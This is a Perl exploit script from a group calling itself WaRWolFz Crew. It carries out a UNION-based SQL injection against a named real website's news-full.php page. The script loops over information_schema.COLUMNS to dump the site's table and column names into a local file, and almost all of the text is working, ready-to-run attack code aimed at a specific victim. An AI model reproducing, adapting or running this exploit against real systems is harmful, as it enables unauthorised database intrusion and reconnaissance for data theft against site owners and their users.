#!/usr/bin/perl
#MyNHWw.co.uk Remote SQL Injection - Dump Table & Column Names Exploit
#Author/s: Dante90, WaRWolFz Crew
#Web Site: www.warwolfz.org

use strict;
use HTTP::Request::Common;
use LWP::UserAgent;
use HTTP::Cookies;

#START - Define Variables
	my $Message = "";
	my $HostName = "www.mynhw.co.uk"; #Insert Victime Web Site Link
	my $Path = "./"; #Insert the path where PHP-Nuke is installed. If it doesn't exist, you have to leave this field empty
	my $Host = "http://".$HostName."/".$Path."/";
	my $Referrer = "http://www.warwolfz.org/";
	my $Method = HTTP::Request->new(GET => $Host);
	my $Cookies = new HTTP::Cookies;
	my $HTTP = new LWP::UserAgent(
				agent => 'Mozilla/5.0',
				max_redirect => 0,
				cookie_jar => $Cookies,
			) or die $!;
#END - Define Variables

sub Clear() {
	my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear';
	return system($launch);
}

sub HTTP_Request(){
	$Referrer = $_[0];
	$Method->referrer($Referrer);
	my $Response = $HTTP->request($Method);
	return $Response->is_success() or die "$Host : ", $Response->message,"\n";
}

sub Usage {
	Clear();
	{
		print " \n MyNHWw.co.uk Remote SQL Injection - Dump Table & Column Names Exploit\n";
		print " ------------------------------------------------------ \n";
		print " * USAGE:                                             *\n";
		print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
		print " * perl name_exploit.pl                               *\n";
		print " ------------------------------------------------------ \n";
		print " *         Powered By Dante90, WaRWolFz Crew          *\n";
		print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
		print " ------------------------------------------------------ \n";
	};
	exit;
}

sub Refresh {
	Clear();
	{
		print " \n MyNHWw.co.uk Remote SQL Injection - Dump Table & Column Names Exploit\n";
		print " ------------------------------------------------------ \n";
		print " * USAGE:                                             *\n";
		print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
		print " * perl name_exploit.pl                               *\n";
		print " ------------------------------------------------------ \n";
		print " *         Powered By Dante90, WaRWolFz Crew          *\n";
		print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
		print " ------------------------------------------------------ \n";
	};
	print " * Victime Site: " . $_[0] . "\n";
	print $_[1] ."\n";
}

sub Failed {
	Clear();
	Refresh($Host, $Message);
	print " * Exploit Failed                                     *\n";
	print " ------------------------------------------------------ \n";
	exit;
}

sub SQL_Injection {
	my ($dec) = @_;
	#http://www.mynhw.co.uk/news-full.php?id=-394 UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,32),table_name,column_name),4,5,6,7,8,9,10,11,12,13 FROM information_schema.COLUMNS LIMIT 0,1--
	return "./news-full.php?id=-394 UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,58,58,32),table_name,column_name),4,5,6,7,8,9,10,11,12,13 FROM information_schema.COLUMNS LIMIT ${dec},1--";
}

sub Main() {
	Clear();
	my ($Table, $Column, $data) = "";
	$Message .= " * Starting...";
	Refresh($Host, $Message);
	open (FILE, ">dump_table_column_name.html") || die ("");
	for(my $I=0; $I<=5000; $I++){
		my $Get = $HTTP->get($Host.SQL_Injection($I));
		if ($Get->content =~ /<span class="style5">([a-zA-Z0-9-_.]{1,50}) ::: ([a-zA-Z0-9-_.]{1,50})<\/span><br \/>/i) {
			$Table = $1;
			$Column = $2;
			$data .= $Table." | ".$Column."\n";
			$Message = " * Starting...";
			$Message .= "\n * Table Name: ".$Table."\n * Column Name: ".$Column."\n";
			Refresh($Host, $Message);
		} elsif ($Get->content !=~ /<span class="style5">/i) {
			$I=5000;
			Refresh($Host, $Message);
		} else {
			$Message .= "\n * Failed.";
			Failed($Host, $Message);
		}
	}
	print FILE $data;
	close (FILE);
	$Message .= " * DUMPED.";
	Refresh($Host, $Message);
	print " * Exploit Successfully Executed                      *\n";
	print " ------------------------------------------------------\n ";
	system("pause");
	exit;
}

Main();

#WaRWolFz Crew


#WaRWolFz 2010.07.27